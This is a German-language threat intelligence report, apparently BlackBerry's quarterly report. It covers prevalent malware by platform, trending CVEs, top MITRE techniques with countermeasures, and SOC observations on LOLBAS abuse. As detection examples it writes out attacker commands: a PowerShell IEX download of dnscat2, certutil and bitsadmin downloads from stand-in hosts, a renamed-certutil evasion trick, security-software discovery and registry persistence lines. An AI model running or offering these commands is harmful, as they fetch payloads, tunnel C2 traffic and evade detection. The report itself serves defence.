Prometei ist ein mehrstufiges, plattformübergreifendes Kryptowährungs-Botnet, das hauptsächlich auf Monero-Münzen abzielt. Es kann seine Nutzlast so anpassen, dass sie entweder auf Linux- oder Windows-Plattformen abzielt. Prometei wurde zusammen mit Mimikatz eingesetzt, um sich auf so viele Endpunkte wie möglich zu verbreiten.
Buhti
Ransomware
Buhti ist eine Ransomware-Operation, die bestehende Varianten anderer Malware wie LockBit oder Babuk nutzt, um Linux- und Windows-Systeme anzugreifen.
Vorherrschende Bedrohungen nach Plattform: Linux
XMRig
Cryptocurrency Miner
XMRig ist in diesem Berichtszeitraum weiterhin weit verbreitet. Der Miner zielt auf Monero ab und ermöglicht es dem Bedrohungsakteur, das System eines Opfers zum Mining von Kryptowährungen ohne dessen Wissen zu nutzen.
NoaBot/Mirai
Verteilter Denial of Service (DDoS)
NoaBot ist eine etwas ausgefeiltere Mirai-Variante. Er verfügt über verbesserte Verschleierungstechniken im Vergleich zu Mirai und verwendet SSH zur Verbreitung anstelle von Telnet. Außerdem wird er mit uClibc anstelle von GCC kompiliert, was die Erkennung erschwert.NoaBot/Mirai
XorDDoS
DDoS
Bei XorDDoS handelt es sich um einen Trojaner, der häufig in unserer Telemetrie beobachtet wird. Er zielt auf Geräte mit Internetzugang und Linux ab und koordiniert infizierte Botnets über C2-Anweisungen. Seinen Namen verdankt er der XOR-Verschlüsselung, mit der er den Zugriff auf Ausführungs- und Kommunikationsdaten kontrolliert.
AcidPour
Wischer
Obwohl in unserer eigenen Telemetrie nicht vorhanden, wurde eine neue Version des Datenlöschers AcidPour in freier Wildbahn gesichtet. Die neueste Version der Malware, die zum Löschen von Dateien auf Routern und Modems verwendet wird, zielt speziell auf Linux-x86-Geräte ab.
Vorherrschende Bedrohungen nach Plattform: MacOS
RustDoor
Hintertür
RustDoor ist eine auf Rust basierende Backdoor-Malware, die hauptsächlich als Updates für legitime Programme getarnt verbreitet wird. Die Malware verbreitet sich als FAT-Binärdateien, die Mach-o-Dateien enthalten.
Atomarer Stehler
Infostealer
Atomic Stealer (AMOS) ist nach wie vor weit verbreitet, und eine neue Version wurde in freier Wildbahn entdeckt. Die neueste Version des Stealers enthält ein Python-Skript, das dabei hilft, unentdeckt zu bleiben. AMOS hat es auf Passwörter, Browser-Cookies, Autofill-Daten, Krypto-Brieftaschen und Mac-Schlüsselbunddaten abgesehen.
Empire-Transfer
Infostealer
Ein Infostealer, der von Moonlock Lab im Februar 2024 entdeckt wurde. Er kann sich "selbst zerstören", wenn er erkennt, dass er in einer virtuellen Umgebung ausgeführt wird. Dadurch bleibt die Malware unentdeckt und erschwert den Verteidigern die Analyse. Empire Transfer hat es auf Passwörter, Browser-Cookies und Krypto-Wallets abgesehen und verwendet eine ähnliche Taktik wie Atomic Stealer (AMOS).
Vorherrschende Bedrohungen nach Plattform: Android
SpyNote
Infostealer/RAT
SpyNote nutzt den Android Accessibility Service, um Benutzerdaten zu erfassen und die erfassten Daten an einen C2-Server zu senden.
Anatsa/Teabot
Infostealer
Wird in erster Linie über den Google Play Store als Trojaner-Anwendung verbreitet. Nach der Erstinfektion durch die Trojaner-Anwendung lädt Anatsa zusätzliche bösartige Dateien von einem C2-Server auf das Gerät des Opfers herunter.
Vultur
Infostealer/RAT
Vultur wurde erstmals im Jahr 2021 entdeckt und über Trojaner-Anwendungen und Social-Engineering-Techniken wie "Smishing" (SMS-Phishing) verbreitet. Neben der Datenexfiltration kann ein Bedrohungsakteur auch Änderungen am Dateisystem vornehmen, Ausführungsberechtigungen modifizieren und das infizierte Gerät über Android Accessibility Services steuern.
Coper/Octo
Infostealer/RAT
Eine Variante der Exobot-Familie. Sie wird als MaaS-Produkt angeboten und verfügt über Funktionen wie Keylogging, SMS-Überwachung, Bildschirmkontrolle, Fernzugriff und C2-Betrieb.
Allgemeine Schwachstellen und Gefährdungen
Die CVEs (Common Vulnerabilities and Exposures - Gemeinsame Schwachstellen und Gefährdungen) bieten einen Rahmen für die Identifizierung, Standardisierung und Veröffentlichung bekannter Sicherheitsschwachstellen und Gefährdungen. Wie bereits erwähnt, nutzen Cyber-Kriminelle CVEs zunehmend, um in Systeme einzudringen und Daten zu stehlen. In diesem Berichtszeitraum wurden neue Schwachstellen in den Produkten von Ivanti, ConnectWise, Fortra und Jenkins gefunden, die böswilligen Tätern neue Möglichkeiten bieten, Opfer anzugreifen. Darüber hinaus haben die letzten Monate die Risiken von Angriffen auf die Lieferkette aufgezeigt, die in Open-Source-Projekten mit der XZ-Backdoor vorhanden sein könnten, die absichtlich in XZ Utils, einem Datenkomprimierungsprogramm, das auf fast allen Linux-Installationen verfügbar ist, eingeschleust wurde.
Von Januar bis März wurden vom National Institute of Standards and Technology (NIST) fast 8.900 neue CVEs gemeldet. Die Basisbewertung setzt sich aus sorgfältig berechneten Metriken zusammen, die zur Berechnung eines Schweregrads von null bis 10 verwendet werden können. Die vorherrschende CVE-Basisbewertung war eine 7", die 26 Prozent der Gesamtbewertung ausmachte. Dies ist ein Anstieg von drei Prozent für diese CVE-Bewertung im Vergleich zum letzten Berichtszeitraum. Der März hält in diesem Jahr den Rekord für die meisten neu entdeckten CVEs, mit fast 3.350 neuen CVEs. Die Tabelle "Trending CVEs" bezieht sich auf bestimmte Schwachstellen, die in der NIST National Vulnerability Database aufgeführt sind.
Aktuelle CVEs
XZ Utils Backdoor
CVE-2024-3094 (10 kritisch)
Unbefugter Zugriff
Dieser bösartige Code war in XZ Utils Version 5.6.0 und 5.6.1 eingebettet. Die Backdoor manipulierte sshd, wodurch nicht authentifizierte Angreifer unberechtigten Zugriff auf die betroffenen Linux-Distributionen erhielten.
Ivanti Zero-Day-Schwachstellen
CVE-2024-21887 (9.1 Kritisch); CVE-2023-46805 (8.2 Hoch); CVE-2024-21888 (8.8 Hoch); CVE-2024-21893 (8.2 Hoch)
Willkürliche Code-Ausführung
Anfang dieses Jahres wurden in den Produkten Ivanti Connect Secure (9.x, 22.x) und Ivanti Policy Secure (9.x, 22.x) Schwachstellen bei der Umgehung der Authentifizierung und der Befehlsinjektion gefunden. Wenn beide Produkte von einem Angreifer zusammen verwendet werden, können sie bösartige Anfragen erstellen und beliebige Befehle auf dem System ausführen.
Im Januar warnte Ivanti außerdem vor zwei weiteren Schwachstellen, die die Produkte betreffen: CVE-2024-21888 (eine Schwachstelle für die Ausweitung von Berechtigungen) und CVE-2024-21893 (eine Schwachstelle für die serverseitige Fälschung von Anfragen). Staatliche Akteure haben diese Zero-Day-Schwachstellen ausgenutzt, um benutzerdefinierte Malware-Stämme zu installieren.
Umgehung des Windows-SmartScreen
CVE-2024-21412 (8.1 Hoch)
Sicherheitsumgehung
Es handelt sich um eine Umgehung der Sicherheitsfunktion für Internet-Verknüpfungsdateien, die Microsoft Windows Internet-Verknüpfungsdateien betrifft. Er erfordert eine Benutzerinteraktion, um die Sicherheitsüberprüfungen zu umgehen. Nach der ersten Interaktion wird eine Reihe von Ausführen veranlasst, die das Opfer schließlich zu einem bösartigen Skript führen. Diese Zero-Day-Schwachstelle wurde von einer Bedrohungsgruppe zur Verbreitung des DarkMe RAT genutzt.
Windows-Kernel-Erweiterungsschwachstelle
CVE-2024-21338 (7.8 Hoch)
Erhöhung von Privilegien
Durch das Ausnutzen dieser Sicherheitslücke kann der Angreifer Systemprivilegien erlangen. Die Lazarus Group (eine nordkoreanische Bedrohungsgruppe) nutzte diese Zero-Day-Schwachstelle im Windows AppLocker-Treiber (appid.sys) aus, um Zugriff auf die Kernel-Ebene zu erhalten.
Fortra's GoAnywhere MFT Sicherheitslücke
CVE-2024-0204 (9.8 Kritisch)
Umgehung der Authentifizierung
Im Januar veröffentlichte Fortra einen Sicherheitshinweis, in dem die kritische Umgehung eines GoAnywhere MFT-Produkts beschrieben wurde. Diese Schwachstelle wurde in GoAnywhere MFT von Fortra vor Version 7.4.1 gefunden. Durch die Ausnutzung der Schwachstelle kann ein unbefugter Benutzer über das Administrationsportal einen Admin-Benutzer erstellen.
Jenkins Sicherheitslücke beim Lesen beliebiger Dateien
CVE-2024-23897 (9.7 Kritisch)
Entfernte Code-Ausführung
Frühere Versionen von Jenkins - bis 2.441 und früher, LTS 2.426.2 - enthalten eine Sicherheitslücke, die im Dateisystem des Jenkins-Controllers über die integrierte Befehlszeilenschnittstelle gefunden wurde. Sie wird in der args4j-Bibliothek gefunden, die eine Funktion hat, die ein "@"-Zeichen, gefolgt von einem Dateipfad in einem Argument, durch den Inhalt der Datei ersetzt.34 Dies wiederum ermöglicht es einem Angreifer, beliebige Dateien auf dem Dateisystem zu lesen, was möglicherweise zu einer entfernten Codeausführung führen kann.
ConnectWise ScreenConnect 23.9.7 Sicherheitslücke
CVE-2024-1709 (10 kritisch); CVE-2024-1708 (8.4 hoch)
Entfernte Code-Ausführung
Diese Sicherheitslücke betrifft das ConnectWise ScreenConnect 23.9.7 Produkt. Es wurde beobachtet, dass Angreifer diese beiden Sicherheitslücken in freier Wildbahn ausnutzen. Beide arbeiten in Verbindung miteinander, wobei CVE-2024-1709 (eine kritische Authentifizierungsumgehungsschwachstelle) es dem Angreifer ermöglicht, administrative Konten zu erstellen und CVE-2024-1708 (eine Pfadumgehungsschwachstelle) auszunutzen, was einen nicht autorisierten Zugriff auf die Dateien und Verzeichnisse des Opfers ermöglicht.
Gemeinsame MITRE-Techniken
Das Verständnis der hochrangigen Techniken von Bedrohungsgruppen kann bei der Entscheidung helfen, welche Erkennungstechniken vorrangig eingesetzt werden sollten. BlackBerry beobachtete die folgenden Top-20-Techniken, die von Bedrohungsakteuren in diesem Berichtszeitraum eingesetzt wurden.
Ein Pfeil nach oben in der letzten Spalte zeigt an, dass die Nutzung der Technik seit unserem letzten Bericht zugenommen hat; ein Pfeil nach unten bedeutet, dass die Nutzung zurückgegangen ist, und ein Gleichheitszeichen (=) bedeutet, dass die Technik an der gleichen Stelle wie in unserem letzten Bericht bleibt.
Technik Name | Technik-ID | Taktik Name | Letzter Bericht | Ändern Sie |
---|---|---|---|---|
Prozess Injektion
|
T1055
|
Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
|
1
|
=
|
Suche nach Systeminformationen
|
T1082
|
Entdeckung
|
3
|
↑
|
DLL-Seiten-Laden
|
T1574.002
|
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
|
4
|
↑
|
Eingabe-Erfassung
|
T1056
|
Zugangsberechtigung, Sammlung
|
2
|
↓
|
Entdeckung von Sicherheitssoftware
|
T1518.001
|
Entdeckung
|
NA
|
↑
|
Maskerade
|
T1036
|
Verteidigung Umgehung
|
10
|
↑
|
Suche nach Dateien und Verzeichnissen
|
T1083
|
Entdeckung
|
13
|
↑
|
Prozess Entdeckung
|
T1057
|
Entdeckung
|
19
|
↑
|
Protokoll der Anwendungsschicht
|
T1071
|
Befehl und Kontrolle
|
6
|
↓
|
Registry Run Keys/Startup Folder
|
T1547.001
|
Persistenz, Privilegieneskalation
|
9
|
↓
|
Nicht-Anwendungsschicht-Protokoll
|
T1095
|
Befehl und Kontrolle
|
5
|
↓
|
Fernerkundung von Systemen
|
T1018
|
Entdeckung
|
15
|
↑
|
Anwendungsfenster Entdeckung
|
T1010
|
Entdeckung
|
NA
|
↑
|
Software-Paketierung
|
T1027.002
|
Verteidigung Umgehung
|
NA
|
↑
|
Geplanter Task/Job
|
T1053
|
Ausführung, Persistenz, Privilegieneskalation
|
8
|
↓
|
Windows-Dienst
|
T1543.003
|
Persistenz, Privilegieneskalation
|
12
|
↓
|
Deaktivieren oder Ändern von Tools
|
T1562.001
|
Verteidigung Umgehung
|
18
|
↑
|
Interpreter für Befehle und Skripte
|
T1059
|
Ausführung
|
7
|
↓
|
Verdeckte Dateien oder Informationen
|
T1027
|
Verteidigung Umgehung
|
NA
|
↑
|
Replikation über Wechseldatenträger
|
T1091
|
Erster Zugang, seitliche Bewegung
|
11
|
↓
|
Technik-ID | |
---|---|
Prozess Injektion |
T1055
|
Suche nach Systeminformationen |
T1082
|
DLL-Seiten-Laden |
T1574.002
|
Eingabe-Erfassung |
T1056
|
Entdeckung von Sicherheitssoftware |
T1518.001
|
Maskerade |
T1036
|
Suche nach Dateien und Verzeichnissen |
T1083
|
Prozess Entdeckung |
T1057
|
Protokoll der Anwendungsschicht |
T1071
|
Registry Run Keys/Startup Folder |
T1547.001
|
Nicht-Anwendungsschicht-Protokoll |
T1095
|
Fernerkundung von Systemen |
T1018
|
Anwendungsfenster Entdeckung |
T1010
|
Software-Paketierung |
T1027.002
|
Geplanter Task/Job |
T1053
|
Windows-Dienst |
T1543.003
|
Deaktivieren oder Ändern von Tools |
T1562.001
|
Interpreter für Befehle und Skripte |
T1059
|
Verdeckte Dateien oder Informationen |
T1027
|
Replikation über Wechseldatenträger |
T1091
|
Taktik Name | |
---|---|
Prozess Injektion |
Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
|
Suche nach Systeminformationen |
Entdeckung
|
DLL-Seiten-Laden |
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
|
Eingabe-Erfassung |
Zugangsberechtigung, Sammlung
|
Entdeckung von Sicherheitssoftware |
Entdeckung
|
Maskerade |
Verteidigung Umgehung
|
Suche nach Dateien und Verzeichnissen |
Entdeckung
|
Prozess Entdeckung |
Entdeckung
|
Protokoll der Anwendungsschicht |
Befehl und Kontrolle
|
Registry Run Keys/Startup Folder |
Persistenz, Privilegieneskalation
|
Nicht-Anwendungsschicht-Protokoll |
Befehl und Kontrolle
|
Fernerkundung von Systemen |
Entdeckung
|
Anwendungsfenster Entdeckung |
Entdeckung
|
Software-Paketierung |
Verteidigung Umgehung
|
Geplanter Task/Job |
Ausführung, Persistenz, Privilegieneskalation
|
Windows-Dienst |
Persistenz, Privilegieneskalation
|
Deaktivieren oder Ändern von Tools |
Verteidigung Umgehung
|
Interpreter für Befehle und Skripte |
Ausführung
|
Verdeckte Dateien oder Informationen |
Verteidigung Umgehung
|
Replikation über Wechseldatenträger |
Erster Zugang, seitliche Bewegung
|
Letzter Bericht | |
---|---|
Prozess Injektion |
1
|
Suche nach Systeminformationen |
3
|
DLL-Seiten-Laden |
4
|
Eingabe-Erfassung |
2
|
Entdeckung von Sicherheitssoftware |
NA
|
Maskerade |
10
|
Suche nach Dateien und Verzeichnissen |
13
|
Prozess Entdeckung |
19
|
Protokoll der Anwendungsschicht |
6
|
Registry Run Keys/Startup Folder |
9
|
Nicht-Anwendungsschicht-Protokoll |
5
|
Fernerkundung von Systemen |
15
|
Anwendungsfenster Entdeckung |
NA
|
Software-Paketierung |
NA
|
Geplanter Task/Job |
8
|
Windows-Dienst |
12
|
Deaktivieren oder Ändern von Tools |
18
|
Interpreter für Befehle und Skripte |
7
|
Verdeckte Dateien oder Informationen |
NA
|
Replikation über Wechseldatenträger |
11
|
Ändern Sie | |
---|---|
Prozess Injektion |
=
|
Suche nach Systeminformationen |
↑
|
DLL-Seiten-Laden |
↑
|
Eingabe-Erfassung |
↓
|
Entdeckung von Sicherheitssoftware |
↑
|
Maskerade |
↑
|
Suche nach Dateien und Verzeichnissen |
↑
|
Prozess Entdeckung |
↑
|
Protokoll der Anwendungsschicht |
↓
|
Registry Run Keys/Startup Folder |
↓
|
Nicht-Anwendungsschicht-Protokoll |
↓
|
Fernerkundung von Systemen |
↑
|
Anwendungsfenster Entdeckung |
↑
|
Software-Paketierung |
↑
|
Geplanter Task/Job |
↓
|
Windows-Dienst |
↓
|
Deaktivieren oder Ändern von Tools |
↑
|
Interpreter für Befehle und Skripte |
↓
|
Verdeckte Dateien oder Informationen |
↑
|
Replikation über Wechseldatenträger |
↓
|
Mithilfe von MITRE D3FEND™hat das Team von BlackBerry Threat Research and Intelligence eine vollständige Liste von Gegenmaßnahmen für die in diesem Berichtszeitraum beobachteten Techniken erstellt, die in unserem öffentlichen GitHub verfügbar ist.
Die drei wichtigsten Techniken sind bekannte Verfahren, die von Angreifern verwendet werden, um Schlüsselinformationen für erfolgreiche Angriffe zu sammeln. Der Abschnitt Angewandte Gegenmaßnahmen enthält einige Beispiele für ihre Verwendung und einige nützliche Informationen zur Überwachung.
Die Auswirkungen der Gesamtheit der Techniken und Taktiken sind in der nachstehenden Grafik zu sehen:
Die am weitesten verbreitete Taktik in diesem Berichtszeitraum ist die Umgehung von Verteidigungsmaßnahmen, die 24 Prozent aller in diesem Zeitraum beobachteten Taktiken ausmacht, gefolgt von Discovery mit 23 Prozent und Privilege Escalation mit 21 Prozent.
Angewandte Gegenmaßnahmen für notierte MITRE-Techniken
-
Entdeckung von Sicherheitssoftware - T1518.001
Diese beliebte Technik ermöglicht es Cyberbedrohungsakteuren, die Liste der installierten Sicherheitsprogramme, Konfigurationen und Sensoren auf einem Zielsystem oder einer Cloud-Umgebung zu finden. Dies ist für einen Angreifer, der hofft, unentdeckt zu bleiben, sehr wichtig. Wenn eine böswillige Gruppe beispielsweise einen der unten aufgeführten Befehle auf einem kompromittierten System ausführt und feststellt, dass die Umgebung bereits über Sicherheitsprogramme verfügt, um böswillige Aktivitäten zu erkennen, bricht sie den Vorgang häufig ab. In anderen Fällen können fortgeschrittene und hartnäckige Gruppen zwischen Sicherheitsanwendungen unterscheiden und einen Weg finden, die schwächeren Anwendungen zu umgehen. Dies kann dazu führen, dass ein Angreifer die Kontrolle über ein System oder eine Cloud-Umgebung erlangt.
Im Folgenden finden Sie Befehlszeilen, die ein Angreifer verwenden könnte, um Ihre Sicherheit zu bewerten:
- netsh firewall show
- netsh.exe Schnittstellen-Dump
- findstr /s /m /i "defender" *.*
- Aufgabenliste /v
- Powershell Reiches Modul Get-AntiVirusProduct
- cmd.exe WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Pfad AntiVirusProduct Get displayName /Format:List
-
Maskerade - T1036
Dies ist eine ausgeklügelte Taktik von Angreifern, um ihre Aktivitäten zu verschleiern und der Entdeckung zu entgehen. Durch die Verwendung eines falschen Namens, eines falschen Symbols und falscher Metadaten können schädliche Aktionen leicht als normale Systemvorgänge getarnt werden. Die Tarnung als legitime Datei oder Prozess kann Benutzer und Sicherheitssoftware dazu verleiten, eine gefälschte Datei zu öffnen oder zu speichern, was zu einem Eindringen in das System und zu Datenverlust führen kann. (Einzelheiten zur Erkennung einer Maskerade-Methode finden Sie in unserem Abschnitt CylanceMDR Beobachtungen in diesem Bericht).
Im Folgenden finden Sie eine Aufschlüsselung der gängigen Maskierungsmethoden:
- Umbenennung von ausführbaren Dateien: Angreifer benennen bösartige ausführbare Dateien oft um, um vorzutäuschen, dass es sich um ein legitimes Systemprogramm handelt (z. B. svchost.exe, explorer.exe), und ändern oder fügen eine andere gefälschte Erweiterung hinzu, um den tatsächlichen Dateityp zu verschleiern, z. B. .txt.doc oder .exe.config. Ziel ist es, Benutzer und Sicherheitstools bei manuellen oder automatischen Systemprüfungen zu täuschen, so dass der Benutzer die bösartige Datei ausführt oder zu öffnen versucht, ohne auf die Systemwarnungen zu achten.
- Nachahmung von Dateipfaden: In einem allgemein vertrauenswürdigen Verzeichnis (z. B. System32) gibt es weniger Beobachtung und Erkennung durch Sicherheitstools. Aus diesem Grund legen Angreifer oft bösartige Dateien in diesen Verzeichnissen ab und geben ihnen legitime Prozessnamen, um sie zu verschleiern.
- Ungültige Code-Signatur: Angreifer können ihre Malware mit ungültigen oder gestohlenen digitalen Zertifikaten signieren, um Sicherheitsmaßnahmen zu umgehen. Dadurch werden Systeme und Benutzer dazu verleitet, bösartigen Dateien oder Prozessen zu vertrauen, da sie den Anschein erwecken, als seien sie von einer legitimen Quelle verifiziert worden. Angreifer können abgelaufene, widerrufene oder in betrügerischer Absicht erlangte Zertifikate verwenden. Um solche Taktiken zu erkennen, sind robuste Prozesse zur Zertifikatsvalidierung und Warnsysteme erforderlich, die ungewöhnliche Zertifikatsdaten oder fehlgeschlagene Validierungen melden können. Beispiel: So geben Sie cmd.exe als Taschenrechneranwendung aus:
Kopieren Sie c:\windows\system32\cmd.exe C:\calc.exe
-
Suche nach Dateien und Verzeichnissen - T1083
Die Datei- und Verzeichniserkennung wird häufig in der Aufklärungsphase eines Angreifers eingesetzt, um Einblicke in die Zielumgebung zu gewinnen, potenzielle Dateien für die Exfiltration oder Manipulation zu identifizieren, sensible Informationen zu finden oder weitere Stufen einer Angriffskette zu unterstützen.
Die folgenden Befehlszeilen werden für diese Technik verwendet:
- 'dir /s C:\path\to\directory' - Verwendet das Dienstprogramm dir, um Dateien und Verzeichnisse in einem bestimmten Verzeichnis und seinen Unterverzeichnissen rekursiv aufzulisten.
- tree /F' - Verwendet das tree-Dienstprogramm, um die Dateinamen in jedem Verzeichnis zusammen mit dem Verzeichnisbaum anzuzeigen.
- powershell.exe -c "Get-ChildItem C:\path\to\directory"' - Implementiert das Cmdlet "Get-ChildItem" in Powershell, das eine Liste von Dateien und Verzeichnissen im angegebenen Pfad abruft.
Bedrohungsakteure können auch systemeigene Windows-API-Funktionen zum Auflisten von Dateien und Verzeichnissen verwenden. Im Folgenden sind die von Bedrohungsakteuren verwendeten Windows-API-Funktionen aufgeführt:
- FindFirstFile - Ruft Informationen über die erste Datei oder das erste Verzeichnis ab, das dem angegebenen Datei- oder Verzeichnisnamensmuster entspricht.
- FindNextFile - Setzt eine Dateisuche fort, die durch einen vorherigen Aufruf der Funktion FindFirstFile eingeleitet wurde.
- PathFileExists - Überprüft, ob ein angegebenes Verzeichnis oder eine Datei existiert.
-
Protokoll der Anwendungsschicht - T1071
Bedrohungsakteure suchen ständig nach neuen Möglichkeiten, ihre Aktionen im legitimen Datenverkehr zu verbergen, um nicht entdeckt zu werden. Die Manipulation des Protokolls der Anwendungsschicht (T1071) ist eine beliebte Technik. In den ersten drei Monaten des Jahres 2024 gehörte diese Technik zu den fünf am häufigsten von böswilligen Akteuren eingesetzten Taktiken. Durch die Ausnutzung von Schwachstellen in gängigen Netzwerkprotokollen wie HTTP, HTTPS, DNS oder SMB können Angreifer bösartige Aktivitäten nahtlos in den normalen Netzwerkverkehr einfügen.
Diese Technik kann verwendet werden, um Daten zu exfiltrieren, C2-Kommunikation zu ermöglichen und sich seitlich in kompromittierten Netzwerken zu bewegen. So können Angreifer beispielsweise sensible Daten in HTTP-Headern verschlüsseln oder DNS-Tunneling nutzen, um die Netzwerkabwehr zu umgehen und Informationen zu extrahieren, ohne Verdacht zu erregen. Die heimliche Manipulation von Protokollen auf der Anwendungsebene stellt eine große Herausforderung für die Erkennung und Zuordnung dar, da viele herkömmliche Sicherheitstools Schwierigkeiten haben, zwischen normalen und bösartigen Netzwerkaktivitäten zu unterscheiden.
Angesichts der Verbreitung und Raffinesse dieser Technik müssen Unternehmen proaktive Maßnahmen ergreifen, um ihre Abwehr zu stärken. Eine robuste Netzwerküberwachungslösung muss in der Lage sein, anomale Datenverkehrsmuster zu erkennen und sicherzustellen, dass verdächtiges Verhalten im Zusammenhang mit der Manipulation von Protokollen auf der Anwendungsebene genau von routinemäßigen Benutzeraktivitäten unterschieden werden kann.
Darüber hinaus können bekannte Schwachstellen und Exploits durch aktuelle Sicherheits-Patches für Netzwerkprotokolle und Anwendungen entschärft werden. Durch die Implementierung von EDR-Lösungen (Endpoint Detection and Response) können Unternehmen ihre Fähigkeit verbessern, böswillige Aktivitäten, die durch die Manipulation von Protokollen auf der Anwendungsebene verübt werden, zu erkennen und darauf zu reagieren, und so ihre allgemeine Cybersicherheit verbessern.
Die folgenden APL-Befehle werden von Bedrohungsakteuren verwendet: curl -F "file=@C:\Users\tester\Desktop\test[.]txt 127[.]0[.]0[.]1/file/upload
powershell IEX (New-Object System.Net.Webclient).DownloadString('hxxps://raw[.]git hubusercontent[.]com/lukebaggett/dnscat2-powershell/master/dnscat2[.]ps1' -
Ausführungsschlüssel in der Registrierung / Startordner - T1547.001
Die Manipulation von Registrierungsschlüsseln/Startordnern ist eine Technik, die von Angreifern eingesetzt wird, um sich auf kompromittierten Systemen zu etablieren. Diese Technik gehörte in diesem Berichtszeitraum zu den am häufigsten von Cyber-Bedrohungsakteuren angewandten Taktiken. Durch die Manipulation von Windows-Registrierungsschlüsseln oder das Hinzufügen bösartiger Einträge zu Startordnern stellen die Angreifer sicher, dass ihre bösartigen Nutzdaten beim Systemstart oder bei der Benutzeranmeldung automatisch ausgeführt werden, was die fortlaufende Kontrolle über die kompromittierten Systeme ermöglicht.
Diese Technik ermöglicht es Angreifern, eine breite Palette von Malware einzusetzen, darunter Backdoors, Keylogger und Ransomware, und so einen dauerhaften Zugriff auf kompromittierte Systeme zu erhalten. Die Angreifer nutzen die systemeigenen Funktionen von Windows aus, um die Erkennung zu umgehen. Der Missbrauch legitimer Systemkonfigurationen macht die Erkennung und Eindämmung dieser Bedrohungen für herkömmliche AV-Lösungen schwieriger.
Um der Bedrohung durch die Manipulation von Registrierungsschlüsseln und Startordnern zu begegnen, müssen Unternehmen einen mehrschichtigen Ansatz für die Endgerätesicherheit wählen:
- Überwachen und prüfen Sie regelmäßig die Windows-Registrierungsschlüssel und Startordner, um unbefugte Änderungen zu erkennen, die auf bösartige Aktivitäten hinweisen.
- Implementieren Sie ein Anwendungs-Whitelisting, um nicht autorisierte ausführbare Dateien zu verhindern.
- Legen Sie Kontrollen für die Rechteverwaltung fest, um die Möglichkeiten von Angreifern zur Manipulation kritischer Systemkonfigurationen einzuschränken.
- Führen Sie Programme zur Schulung und Sensibilisierung der Benutzer durch, um Mitarbeiter in die Lage zu versetzen, verdächtige Startobjekte oder Änderungen an der Registrierung zu erkennen und zu melden.
- Verbesserung der allgemeinen Fähigkeiten zur Erkennung von und Reaktion auf Bedrohungen.
Einige Befehle, auf die Sie achten sollten, sind:
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Test /t REG_SZ /d "Test McTesterson"
echo "" > "%APPDATA%\\Microsoft\\Windows\\Startmenü\\Programme\\Startup\\file[.]txt"
CylanceMDR Daten
In diesem Abschnitt des Berichts werden einige der häufigsten Bedrohungserkennungen hervorgehoben, die in Kundenumgebungen von CylanceMDR beobachtet wurden.
CylanceMDR, früher bekannt als CylanceGUARD®, ist ein abonnementbasierter Managed Detection and Response (MDR)-Service von BlackBerry , der eine 24x7-Überwachung bietet und Unternehmen dabei hilft, ausgeklügelte Cyberbedrohungen zu stoppen, die Lücken in den Sicherheitsprogrammen der Kunden ausnutzen. Das Team von CylanceMDR verfolgte in diesem Berichtszeitraum Tausende von Warnmeldungen. Im Folgenden werden die Telemetriedaten nach Regionen aufgeschlüsselt, um einen zusätzlichen Einblick in die aktuelle Bedrohungslandschaft zu geben.
CylanceMDR Beobachtungen
In diesem Berichtszeitraum stellte das Team von CylanceMDR fest, dass Certutil für viele Erkennungsaktivitäten innerhalb des Security Operations Center (SOC) verantwortlich war, und zwar die Technik im Zusammenhang mit der Umbenennung von Tools wie Certutil (z. B.: "Mögliche Certutil-Umbenennung"). In allen geografischen Regionen, in denen BlackBerry Kunden schützt, kam es zu einer Häufung von Entdeckungen in diesem Zusammenhang.
In unserem letzten Bericht haben wir erörtert, wie LOLBAS-Dienstprogramme (Living-off-the-land binaries and scripts) wie Certutil von Bedrohungsakteuren missbraucht werden: Sie benennen oft legitime Dienstprogramme (wie Certutil) um, um die Erkennungsfunktionen zu umgehen. Dies wird als masquerading bezeichnet und hat die MITRE Technique ID: T1036.003. Verteidiger müssen robuste Erkennungsfunktionen einsetzen, um das Risiko von Umgehungstechniken wie dem Masquerading zu minimieren. So kann beispielsweise eine Erkennungsregel, die nur ausgelöst wird, wenn sie den Befehl Certutil (zusammen mit allen Optionen/Argumenten, die mit diesem Tool missbraucht werden) sieht, leicht umgangen werden.
Nehmen Sie zum Beispiel die beiden folgenden Befehle:
certutil.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt
Wenn sich Ihre Erkennungsfunktionen nur darauf verlassen, dass der Befehl certutil (zusammen mit seinen Optionen) erkannt wird, wird dies zwar erkannt, aber als schwacher Schutz betrachtet, da er leicht umgangen werden kann.
outlook.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt
In diesem Fall haben wir certutil.exe in outlook.exe umbenannt, und dies würde die Erkennung vollständig umgehen (wenn die oben beschriebene Logik verwendet wird).
Eine bessere Lösung wäre es, dafür zu sorgen, dass die PE-Metadaten (portable executable file/process), wie z. B. der ursprüngliche Dateiname (der interne Dateiname, der bei der Kompilierung angegeben wurde), erfasst und in die Erkennungsfunktionen integriert werden. Eine Nichtübereinstimmung zwischen dem Dateinamen auf der Festplatte und den PE-Metadaten der Binärdatei ist ein guter Indikator dafür, dass eine Binärdatei nach der Kompilierung umbenannt wurde.
LOLBAS Aktivität
In diesem Berichtszeitraum haben wir eine Veränderung der LOLBAS-Aktivitäten bei unseren Kunden festgestellt:
- Zunahme der Entdeckungen im Zusammenhang mit regsvr32.exe.
- Rückgang der mshta.exe-bezogenen Aktivität.
- Starke Zunahme der Erkennungen im Zusammenhang mit bitsadmin.exe.
Nachstehend ein Beispiel für die böswillige Nutzung von LOLBAS (mit Ausnahme derjenigen, die im letzten Berichtszeitraum freigegeben wurden).
Datei: Bitsadmin.exe
Mitre: T1197 | T1105
Wie es missbraucht werden kann:
- Herunter-/Hochladen von oder auf einen bösartigen Host (Übertragung von Ingress-Tools)
- Kann zur Ausführung bösartiger Prozesse verwendet werden
Example Command:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest
Datei: mofcomp.exe
Mitre: T1218
Wie es missbraucht werden kann:
- Kann verwendet werden, um bösartige MOF-Skripte (Managed Object Format) zu installieren
